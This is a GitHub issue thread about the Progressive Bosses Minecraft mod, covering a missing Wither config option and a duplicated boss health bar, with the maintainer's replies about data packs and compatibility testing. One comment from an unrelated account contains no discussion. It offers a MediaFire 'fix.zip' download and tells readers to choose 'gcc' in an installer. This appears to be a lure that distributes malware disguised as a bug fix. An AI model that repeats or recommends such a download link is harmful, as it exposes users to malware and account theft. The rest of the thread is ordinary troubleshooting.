### ISSUE TITLE
No config option for the Wither and duplicated boss health bar (Alpha)

### ISSUE THREAD

**Issue by YeraX7** [Insane96/ProgressiveBosses#161]
## Versions
 - Minecraft: 1.20.1
 - Forge: 47.3.0
 - Progressive Bosses: 4,1,12
 - InsaneLib: 1.13.5

## Describe the bug

There is no config option for the Wither and duplicated boss health bar.
I know its an alpha but just to let you know.

## Tried reproducing with just Progressive Bosses?
Yes

If it is going to be fixed, do you know more or less when new updates will be released? 
Thanks!

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Insane96** [comment]
Wither has no longer a config. You have to use Data Pack to configure it.  
https://github.com/Insane96/ProgressiveBosses/tree/1.20.x/src/main/resources/data/progressivebosses/progressivebosses

**Comment by Insane96** [comment]
Also, can't reproduce it with Progressive Bosses only (+InsaneLib obv) and Forge 47.3.5

The second bar appears for a second and then disappears like intended.

**Comment by YeraX7** [comment]
Thank you for your response! How can I download the datapack?

About not being able to reproduce the error, it's not a big problem as the main problem is that the wither bar of minecraft vanilla is generated for 1 second as it makes it not compatible with the Enhanced Boss Bars resourcepack, as the new texture is added to the disappearing bar.

Where you could reproduce the error to check for incompatibilities is in my modpack I was trying it with which is: [Modpack Link](https://www.curseforge.com/minecraft/modpacks/biohazard-project-genesis-the-ultimate-apocalypse)

As an idea to solve incompatibilities and so on, it would be a good idea maybe to make the vanilla wither of minecraft not to show even 1 second the boss bar? (Unregister the wither vanilla as boss)

Thank you!

**Comment by Insane96** [comment]
> Thank you for your response! How can I download the datapack?

You have to create it yourself

> About not being able to reproduce the error, it's not a big problem as the main problem is that the wither bar of minecraft vanilla is generated for 1 second as it makes it not compatible with the Enhanced Boss Bars resourcepack, as the new texture is added to the disappearing bar.

You probably have to change the ID of the wither since I use the modded one `progressivebosses:wither`

> Where you could reproduce the error to check for incompatibilities is in my modpack I was trying it with which is: [Modpack Link](https://www.curseforge.com/minecraft/modpacks/biohazard-project-genesis-the-ultimate-apocalypse)

No, use binary search

> As an idea to solve incompatibilities and so on, it would be a good idea maybe to make the vanilla wither of minecraft not to show even 1 second the boss bar? (Unregister the wither vanilla as boss)

Quite sure that's not the problem of the resource pack, but yes, that's planned but I have zero idea on how to fix it.
